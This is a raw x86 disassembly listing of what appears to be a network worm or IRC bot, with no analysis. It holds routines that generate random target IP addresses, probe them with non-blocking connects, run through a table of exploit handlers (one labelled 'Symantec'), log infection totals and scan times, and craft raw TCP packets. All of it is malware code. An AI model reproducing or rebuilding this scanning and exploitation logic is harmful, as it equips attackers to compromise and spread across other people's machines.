mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_40BB07: ; CODE XREF: sub_40BA78+88�j
mov eax, edi
pop edi
leave
retn
sub_40BA78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BB0C proc near ; CODE XREF: sub_40B9E4+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
xor ebx, ebx
jmp short loc_40BB3C
; ---------------------------------------------------------------------------
loc_40BB26: ; CODE XREF: sub_40BB0C+36�j
mov dl, [eax]
cmp dl, 3Fh
jz short loc_40BB37
cmp dl, 2Ah
jnz short loc_40BB49
cmp dl, 3Fh
jnz short loc_40BB3A
loc_40BB37: ; CODE XREF: sub_40BB0C+1F�j
inc ecx
mov [edi], ecx
loc_40BB3A: ; CODE XREF: sub_40BB0C+29�j
inc dword ptr [esi]
loc_40BB3C: ; CODE XREF: sub_40BB0C+18�j
mov ecx, [edi]
mov eax, [esi]
cmp [ecx], bl
jnz short loc_40BB26
jmp short loc_40BB49
; ---------------------------------------------------------------------------
loc_40BB46: ; CODE XREF: sub_40BB0C+40�j
inc eax
mov [esi], eax
loc_40BB49: ; CODE XREF: sub_40BB0C+24�j
; sub_40BB0C+38�j
cmp byte ptr [eax], 2Ah
jz short loc_40BB46
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_40BB6B
cmp [eax], bl
jz short loc_40BB5E
xor eax, eax
jmp short loc_40BBC8
; ---------------------------------------------------------------------------
loc_40BB5E: ; CODE XREF: sub_40BB0C+4C�j
cmp dl, bl
jnz short loc_40BB6B
cmp [eax], bl
jnz short loc_40BB6B
xor eax, eax
inc eax
jmp short loc_40BBC8
; ---------------------------------------------------------------------------
loc_40BB6B: ; CODE XREF: sub_40BB0C+48�j
; sub_40BB0C+54�j ...
push ecx
push eax
call sub_40B9E4
pop ecx
test eax, eax
pop ecx
jnz short loc_40BBB2
loc_40BB78: ; CODE XREF: sub_40BB0C+A4�j
inc dword ptr [edi]
mov eax, [edi]
jmp short loc_40BB8A
; ---------------------------------------------------------------------------
loc_40BB7E: ; CODE XREF: sub_40BB0C+86�j
cmp cl, 5Bh
jz short loc_40BB94
cmp dl, bl
jz short loc_40BB94
inc eax
mov [edi], eax
loc_40BB8A: ; CODE XREF: sub_40BB0C+70�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jnz short loc_40BB7E
loc_40BB94: ; CODE XREF: sub_40BB0C+75�j
; sub_40BB0C+79�j
cmp [eax], bl
jz short loc_40BBA9
push eax
push dword ptr [esi]
call sub_40B9E4
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40BBAE
; ---------------------------------------------------------------------------
loc_40BBA9: ; CODE XREF: sub_40BB0C+8A�j
mov [ebp+var_4], ebx
xor eax, eax
loc_40BBAE: ; CODE XREF: sub_40BB0C+9B�j
cmp eax, ebx
jnz short loc_40BB78
loc_40BBB2: ; CODE XREF: sub_40BB0C+6A�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_40BBC5
mov eax, [esi]
cmp [eax], bl
jnz short loc_40BBC5
mov [ebp+var_4], 1
loc_40BBC5: ; CODE XREF: sub_40BB0C+AA�j
; sub_40BB0C+B0�j
mov eax, [ebp+var_4]
loc_40BBC8: ; CODE XREF: sub_40BB0C+50�j
; sub_40BB0C+5D�j
pop edi
pop esi
pop ebx
leave
retn
sub_40BB0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BBCD proc near ; CODE XREF: sub_401C87+2AEE�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset unk_4484F8
push eax
xor ebx, ebx
call sub_41EA60
cmp ds:dword_4481F0, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40BC3F
push esi
mov esi, offset dword_4481F8
loc_40BC00: ; CODE XREF: sub_40BBCD+6F�j
mov eax, [esi]
test eax, eax
jbe short loc_40BC35
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset dword_448518
push eax
call sub_41EA60
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_41FAC0
add esp, 1Ch
loc_40BC35: ; CODE XREF: sub_40BBCD+37�j
add esi, 40h
cmp dword ptr [esi-8], 0
jnz short loc_40BC00
pop esi
loc_40BC3F: ; CODE XREF: sub_40BBCD+2B�j
push ds:dword_4E2D04
call sub_41B51B
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_41EA60
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_41FAC0
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
lea eax, [ebp+var_200]
push eax
call sub_415A3C
add esp, 38h
pop edi
pop ebx
leave
retn
sub_40BBCD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BC9B proc near ; CODE XREF: sub_401C87+2AD8�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
mov eax, ds:dword_4E5ACC
mov ecx, ds:dword_4E5AC8
push esi
push ds:dword_4E2D04
lea esi, [ecx+eax]
call sub_41B51B
push eax
push esi
push ds:dword_4E5ACC
lea eax, [ebp+var_200]
push ds:dword_4E5AC8
push offset unk_448538
push eax
call sub_41EA60
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
lea eax, [ebp+var_200]
push eax
call sub_415A3C
add esp, 34h
pop esi
leave
retn
sub_40BC9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BD06 proc near ; CODE XREF: sub_401C87+2AC2�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push ds:dword_4E2D04
call sub_41B51B
push eax
lea eax, [ebp+var_200]
push ds:dword_4E5D08
push offset unk_448580
push eax
call sub_41EA60
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
lea eax, [ebp+var_200]
push eax
call sub_415A3C
add esp, 2Ch
leave
retn
sub_40BD06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BD5A proc near ; CODE XREF: sub_401C87+2AAC�p
var_1000 = byte ptr -1000h
var_800 = byte ptr -800h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 1000h
call sub_41EF80
push edi
lea eax, [ebp+var_800]
push offset dword_4485AC
push eax
call sub_41EA60
cmp ds:dword_4481F0, 0
pop ecx
pop ecx
mov edi, 800h
jz short loc_40BDC6
push esi
mov esi, offset aSymantec ; "Symantec"
loc_40BD8F: ; CODE XREF: sub_40BD5A+69�j
lea eax, [esi-0Ah]
push eax
push esi
lea eax, [ebp+var_1000]
push offset dword_4485C8
push eax
call sub_41EA60
lea eax, [ebp+var_1000]
push edi
push eax
lea eax, [ebp+var_800]
push eax
call sub_41FAC0
add esi, 40h
add esp, 1Ch
cmp dword ptr [esi+1Eh], 0
jnz short loc_40BD8F
pop esi
loc_40BDC6: ; CODE XREF: sub_40BD5A+2D�j
push ds:dword_4E2D04
call sub_41B51B
push eax
lea eax, [ebp+var_1000]
push offset aScanTimeS_ ; " Scan Time: %s."
push eax
call sub_41EA60
lea eax, [ebp+var_1000]
push edi
push eax
lea eax, [ebp+var_800]
push eax
call sub_41FAC0
push 0
lea eax, [ebp+var_800]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
lea eax, [ebp+var_800]
push eax
call sub_415A3C
add esp, 34h
pop edi
leave
retn
sub_40BD5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE20 proc near ; DATA XREF: sub_401C87+30EB�o
var_3F0 = byte ptr -3F0h
var_1F0 = dword ptr -1F0h
var_1EC = byte ptr -1ECh
var_1DC = byte ptr -1DCh
var_15C = byte ptr -15Ch
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_134 = byte ptr -134h
var_124 = byte ptr -124h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3F0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Bh
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
mov dword ptr [eax+128h], 1
lea eax, [ebp+var_134]
push eax
call ds:dword_4E3008 ; inet_addr
xor edi, edi
mov [ebp+var_8], eax
cmp ds:dword_4481F0, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], edi
jz loc_40BF7F
mov esi, offset dword_4481F0
mov ebx, offset aSym ; "sym"
loc_40BE74: ; CODE XREF: sub_40BE20+159�j
push [ebp+var_1C]
push dword ptr [esi]
push [ebp+var_8]
call sub_40C611
add esp, 0Ch
cmp eax, 1
jnz loc_40BF6E
push dword ptr [esi]
lea eax, [ebp+var_134]
push eax
lea eax, [ebx+0Ah]
push eax
lea eax, [ebp+var_3F0]
push offset unk_4485E8
push eax
call sub_41EA60
push edi
lea eax, [ebp+var_3F0]
push [ebp+var_14]
push eax
lea eax, [ebp+var_124]
push eax
push [ebp+var_24]
call sub_409C75
lea eax, [ebp+var_3F0]
push eax
call sub_415A3C
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_1EC]
push eax
call sub_41EA60
lea eax, [ebp+var_15C]
push ebx
push eax
call sub_41EA60
add esp, 3Ch
cmp [ebp+var_A4], 0
lea eax, [ebp+var_A4]
jnz short loc_40BF09
lea eax, [ebp+var_124]
loc_40BF09: ; CODE XREF: sub_40BE20+E1�j
push eax
lea eax, [ebp+var_1DC]
push eax
call sub_41EA60
mov eax, [ebp+var_24]
pop ecx
mov [ebp+var_1F0], eax
mov eax, [ebp+var_14]
mov [ebp+var_140], eax
mov eax, [ebp+var_10]
pop ecx
mov [ebp+var_13C], eax
mov eax, [esi]
sub esp, 0BCh
mov [ebp+var_150], eax
mov eax, [ebp+var_18]
push 2Fh
mov [ebp+var_14C], eax
mov eax, [ebp+arg_0]
pop ecx
lea esi, [ebp+var_1F0]
mov edi, esp
mov [ebp+var_148], eax
rep movsd
call dword ptr [ebx+2Ch]
add esp, 0BCh
inc [ebp+var_4]
xor edi, edi
loc_40BF6E: ; CODE XREF: sub_40BE20+67�j
inc [ebp+arg_0]
add ebx, 40h
lea esi, [ebx+28h]
cmp [esi], edi
jnz loc_40BE74
loc_40BF7F: ; CODE XREF: sub_40BE20+44�j
push [ebp+var_4]
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_3F0]
push offset unk_448618
push eax
call sub_41EA60
push edi
lea eax, [ebp+var_3F0]
push [ebp+var_14]
push eax
lea eax, [ebp+var_124]
push eax
push [ebp+var_24]
call sub_409C75
lea eax, [ebp+var_3F0]
push eax
call sub_415A3C
push [ebp+var_18]
call sub_40B9A7
add esp, 2Ch
push edi
call ds:dword_4F53A0 ; ExitThread
sub_40BE20 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BFD2 proc near ; CODE XREF: sub_401C87+23FC�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 0Bh
call sub_40B8D3
test eax, eax
pop ecx
jle short loc_40C00E
mov eax, [ebp+arg_C]
push ds:dword_4E3110[eax*8]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset unk_44864C
push eax
call sub_41EA60
add esp, 0Ch
jmp short loc_40C021
; ---------------------------------------------------------------------------
loc_40C00E: ; CODE XREF: sub_40BFD2+13�j
lea eax, [ebp+var_200]
push offset unk_448668
push eax
call sub_41EA60
pop ecx
pop ecx
loc_40C021: ; CODE XREF: sub_40BFD2+3A�j
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
lea eax, [ebp+var_200]
push eax
call sub_415A3C
add esp, 18h
leave
retn
sub_40BFD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C049 proc near ; CODE XREF: sub_40CA91+4F�p
var_210 = dword ptr -210h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_40C529
shl eax, 6
xor ebx, ebx
cmp ds:dword_4481FC[eax], ebx
jz loc_40C529
push 5
call sub_40B8D3
test eax, eax
pop ecx
jnz loc_40C2C3
mov eax, ds:dword_43F07C
push edi
mov esi, offset dword_4E51CC
push 104h
push esi
push ebx
mov ds:dword_4E53DC, eax
mov ds:dword_4E53D8, ebx
call ds:off_4F5344
mov edi, offset byte_43F0FC
push 103h
push edi
push offset dword_4E52D0
call sub_41E510
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov ds:dword_4E51C8, eax
mov eax, [ebp+arg_138]
push 7Fh
mov ds:dword_4E5460, eax
jnz short loc_40C0F9
lea eax, [ebp+arg_10]
push eax
push offset dword_4E53E0
call sub_41E510
mov ds:dword_4E5464, 1
jmp short loc_40C110
; ---------------------------------------------------------------------------
loc_40C0F9: ; CODE XREF: sub_40C049+94�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4E53E0
call sub_41E510
mov ds:dword_4E5464, ebx
loc_40C110: ; CODE XREF: sub_40C049+AE�j
add esp, 0Ch
lea eax, [ebp+var_204]
push esi
push ds:dword_4E53DC
push offset unk_448688
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_40B691
add esp, 1Ch
mov ds:dword_4E53D4, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E51C8
push offset sub_41206F
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, ds:dword_4E53D4
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz loc_40C214
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_4486BC
push eax
call sub_41EA60
add esp, 0Ch
loc_40C18E: ; CODE XREF: sub_40C049+1D3�j
lea eax, [ebp+var_204]
push eax
call sub_415A3C
mov eax, ds:dword_4E2D00
mov esi, offset dword_4E5474
mov [esp+210h+var_210], 104h
push esi
push ebx
mov ds:dword_4E5684, eax
mov ds:dword_4E5680, ebx
call ds:off_4F5344
push 103h
push edi
push offset dword_4E5578
call sub_41E510
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov ds:dword_4E5470, eax
mov eax, [ebp+arg_138]
pop edi
mov ds:dword_4E5708, eax
push 7Fh
jnz short loc_40C221
lea eax, [ebp+arg_10]
push eax
push offset dword_4E5688
call sub_41E510
mov ds:dword_4E570C, 1
jmp short loc_40C238
; ---------------------------------------------------------------------------
loc_40C20C: ; CODE XREF: sub_40C049+1D1�j
push 32h
call ds:dword_4F534C ; Sleep
loc_40C214: ; CODE XREF: sub_40C049+124�j
cmp ds:dword_4E5468, ebx
jz short loc_40C20C
jmp loc_40C18E
; ---------------------------------------------------------------------------
loc_40C221: ; CODE XREF: sub_40C049+1A7�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4E5688
call sub_41E510
mov ds:dword_4E570C, ebx
loc_40C238: ; CODE XREF: sub_40C049+1C1�j
add esp, 0Ch
lea eax, [ebp+var_204]
push esi
push ds:dword_4E5684
push offset unk_4486F0
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_40B691
add esp, 1Ch
mov ds:dword_4E567C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E5470
push offset sub_40F2F1
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, ds:dword_4E567C
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz loc_40C33C
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_448724
push eax
call sub_41EA60
add esp, 0Ch
loc_40C2B6: ; CODE XREF: sub_40C049+2FB�j
lea eax, [ebp+var_204]
push eax
call sub_415A3C
pop ecx
loc_40C2C3: ; CODE XREF: sub_40C049+35�j
mov eax, [ebp+arg_130]
mov ecx, eax
shl ecx, 6
cmp ds:dword_448204[ecx], ebx
jz loc_40C3F0
push 7
call sub_40B8D3
test eax, eax
pop ecx
jnz loc_40C3EA
mov eax, ds:dword_4E5D04
cmp [ebp+arg_90], bl
mov ds:dword_4E5134, eax
mov eax, [ebp+arg_110]
mov ds:dword_4E5128, eax
mov eax, [ebp+arg_138]
mov ds:dword_4E5130, ebx
mov ds:dword_4E51B8, eax
push 7Fh
jnz short loc_40C349
lea eax, [ebp+arg_10]
push eax
push offset dword_4E5138
call sub_41E510
mov ds:dword_4E51BC, 1
jmp short loc_40C360
; ---------------------------------------------------------------------------
loc_40C334: ; CODE XREF: sub_40C049+2F9�j
push 32h
call ds:dword_4F534C ; Sleep
loc_40C33C: ; CODE XREF: sub_40C049+24C�j
cmp ds:dword_4E5710, ebx
jz short loc_40C334
jmp loc_40C2B6
; ---------------------------------------------------------------------------
loc_40C349: ; CODE XREF: sub_40C049+2CF�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4E5138
call sub_41E510
mov ds:dword_4E51BC, ebx
loc_40C360: ; CODE XREF: sub_40C049+2E9�j
add esp, 0Ch
lea eax, [ebp+var_204]
push ds:dword_4E5134
push offset unk_448758
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_204]
push 7
push eax
call sub_40B691
add esp, 18h
mov ds:dword_4E512C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E5128
push offset sub_40F04F
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, ds:dword_4E512C
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jnz loc_40C4E2
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_448788
push eax
call sub_41EA60
add esp, 0Ch
loc_40C3DD: ; CODE XREF: sub_40C049+4A1�j
lea eax, [ebp+var_204]
push eax
call sub_415A3C
pop ecx
loc_40C3EA: ; CODE XREF: sub_40C049+29B�j
mov eax, [ebp+arg_130]
loc_40C3F0: ; CODE XREF: sub_40C049+28B�j
shl eax, 6
cmp ds:dword_448200[eax], ebx
jz loc_40C529
push 3
call sub_40B8D3
test eax, eax
pop ecx
jnz loc_40C529
mov esi, offset dword_4E59A4
push 104h
push esi
push ebx
call ds:off_4F5344
push 5Ch
push esi
call sub_41F5B0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40C431
mov [eax], bl
loc_40C431: ; CODE XREF: sub_40C049+3E4�j
mov eax, ds:dword_43F080
mov ds:dword_4E5ABC, ebx
mov ds:dword_4E5AA8, eax
lea eax, [ebp+arg_10]
push eax
push offset dword_4E571C
call sub_41EA60
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov ds:dword_4E5718, eax
mov ecx, [ebp+arg_138]
push esi
push ds:dword_4E5AA8
mov ds:dword_4E5AB4, ecx
mov ecx, [ebp+arg_13C]
push eax
mov ds:dword_4E5AB8, ecx
call sub_40AEAD
pop ecx
push eax
lea eax, [ebp+var_204]
push offset unk_4487C0
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_204]
push 3
push eax
call sub_40B691
add esp, 20h
mov ds:dword_4E5AB0, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E5718
push offset sub_40FA20
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, ds:dword_4E5AB0
imul ecx, 234h
cmp eax, ebx
mov ds:dword_455F14[ecx], eax
jz short loc_40C501
jmp short loc_40C4F7
; ---------------------------------------------------------------------------
loc_40C4DA: ; CODE XREF: sub_40C049+49F�j
push 32h
call ds:dword_4F534C ; Sleep
loc_40C4E2: ; CODE XREF: sub_40C049+373�j
cmp ds:dword_4E51C0, ebx
jz short loc_40C4DA
jmp loc_40C3DD
; ---------------------------------------------------------------------------
loc_40C4EF: ; CODE XREF: sub_40C049+4B4�j
push 32h
call ds:dword_4F534C ; Sleep
loc_40C4F7: ; CODE XREF: sub_40C049+48F�j
cmp ds:dword_4E5AC4, ebx
jz short loc_40C4EF
jmp short loc_40C51C
; ---------------------------------------------------------------------------
loc_40C501: ; CODE XREF: sub_40C049+48D�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_4487FC
push eax
call sub_41EA60
add esp, 0Ch
loc_40C51C: ; CODE XREF: sub_40C049+4B6�j
lea eax, [ebp+var_204]
push eax
call sub_415A3C
pop ecx
loc_40C529: ; CODE XREF: sub_40C049+14�j
; sub_40C049+25�j ...
pop esi
pop ebx
leave
retn
sub_40C049 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C52D proc near ; CODE XREF: sub_40C87D:loc_40C8DF�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:4E3110h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_41FBF0
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_4E2EF0 ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_4E2FC4 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_41FBF0
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_40C52D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C575 proc near ; CODE XREF: sub_40C87D+5A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_41BC70
cmp eax, 0Fh
pop ecx
jbe short loc_40C59D
xor eax, eax
jmp short loc_40C60E
; ---------------------------------------------------------------------------
loc_40C59D: ; CODE XREF: sub_40C575+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_41FF30
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_40C5CA
call sub_41EB70
mov [ebp+var_C], eax
loc_40C5CA: ; CODE XREF: sub_40C575+4B�j
cmp [ebp+var_8], esi
jnz short loc_40C5D7
call sub_41EB70
mov [ebp+var_8], eax
loc_40C5D7: ; CODE XREF: sub_40C575+58�j
cmp [ebp+var_4], esi
jnz short loc_40C5E4
call sub_41EB70
mov [ebp+var_4], eax
loc_40C5E4: ; CODE XREF: sub_40C575+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_40C5F0
call sub_41EB70
loc_40C5F0: ; CODE XREF: sub_40C575+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov ds:dword_4E3110[ecx*8], eax
loc_40C60E: ; CODE XREF: sub_40C575+26�j
pop esi
leave
retn
sub_40C575 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C611 proc near ; CODE XREF: sub_40BE20+5C�p
; sub_40C87D+A9�p ...
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
inc edi
push ebx
push edi
push 2
mov [ebp+var_4], edi
call ds:dword_4E3048 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40C63A
xor eax, eax
jmp short loc_40C6A9
; ---------------------------------------------------------------------------
loc_40C63A: ; CODE XREF: sub_40C611+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call ds:dword_4E2FC8 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call ds:dword_4E3064 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call ds:dword_4E2F70 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call ds:dword_4E2FB0 ; select
push esi
mov edi, eax
call ds:dword_4E3060 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_40C6A9: ; CODE XREF: sub_40C611+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C611 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 10110h
call sub_41EF80
push ebx
push esi
push edi
mov edi, 2649h
push edi
call ds:dword_4E2FC8 ; htons
push dword ptr [ebp+10h]
mov [ebp-28h], ax
call ds:dword_4E2FC8 ; htons
mov [ebp-26h], ax
call sub_41EB70
xor ebx, ebx
push 200h
mov [ebp-24h], eax
mov [ebp-20h], ebx
mov [ebp-1Ch], bx
mov [ebp-0Ch], bx
mov word ptr [ebp-1Ah], 5
mov [ebp-18h], bx
mov word ptr [ebp-16h], 1
mov [ebp-14h], bx
mov [ebp-12h], bx
mov [ebp-10h], bx
mov [ebp-0Eh], bx
call ds:dword_4E2FC8 ; htons
mov esi, [ebp+0Ch]
mov [ebp-0Ah], ax
mov eax, [ebp+8]
push 24h
mov [ebp-8], bx
mov [ebp-6], bx
mov [ebp-58h], eax
mov [ebp-54h], esi
mov [ebp-50h], bl
mov byte ptr [ebp-4Fh], 6
call ds:dword_4E2FC8 ; htons
mov [ebp-4Eh], ax
lea eax, [ebp-28h]
push 24h
push eax
lea eax, [ebp-4Ch]
push eax
call sub_41FBF0
lea eax, [ebp-58h]
push 20h
push eax
call sub_40AF06
mov [ebp-8], ax
push 10h
lea eax, [ebp-38h]
push ebx
push eax
call sub_41E4B0
add esp, 20h
mov word ptr [ebp-38h], 2
push dword ptr [ebp+10h]
call ds:dword_4E2FC8 ; htons
push 6
push 3
push 2
mov [ebp-36h], ax
mov [ebp-34h], esi
mov dword ptr [ebp-4], 10h
call ds:dword_4E3048 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40C7AD
push offset aSocketOpenFail ; "socket open failed"
jmp loc_40C870
; ---------------------------------------------------------------------------
loc_40C7AD: ; CODE XREF: _0:0040C7A1�j
push dword ptr [ebp-4]
lea eax, [ebp-38h]
push eax
push ebx
lea eax, [ebp-28h]
push 24h
push eax
push esi
call ds:dword_4E302C ; sendto
cmp eax, 14h
mov [ebp+10h], eax
jz short loc_40C7F6
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp-0D8h]
push dword ptr [ebp+10h]
push offset aSendtoSocketFa ; "sendto() socket failed. sent = %d <%d>."...
push eax
call sub_41EA60
lea eax, [ebp-0D8h]
push eax
call sub_415A3C
add esp, 14h
jmp short loc_40C862
; ---------------------------------------------------------------------------
loc_40C7F6: ; CODE XREF: _0:0040C7C8�j
push 10038h
lea eax, [ebp-10110h]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
jmp short loc_40C82D
; ---------------------------------------------------------------------------
loc_40C80D: ; CODE XREF: _0:0040C834�j
lea eax, [ebp-4]
push eax
lea eax, [ebp-38h]
push eax
push ebx
lea eax, [ebp-10110h]
push 10038h
push eax
push esi
call ds:dword_4E2FA0 ; recvfrom
test eax, eax
jl short loc_40C857
loc_40C82D: ; CODE XREF: _0:0040C80B�j
cmp [ebp-100FAh], di
jnz short loc_40C80D
push esi
call ds:dword_4E3060 ; closesocket
cmp word ptr [ebp-100EAh], 1
jnz short loc_40C86B
push offset aSocketOpen_ ; "Socket open."
call sub_415A3C
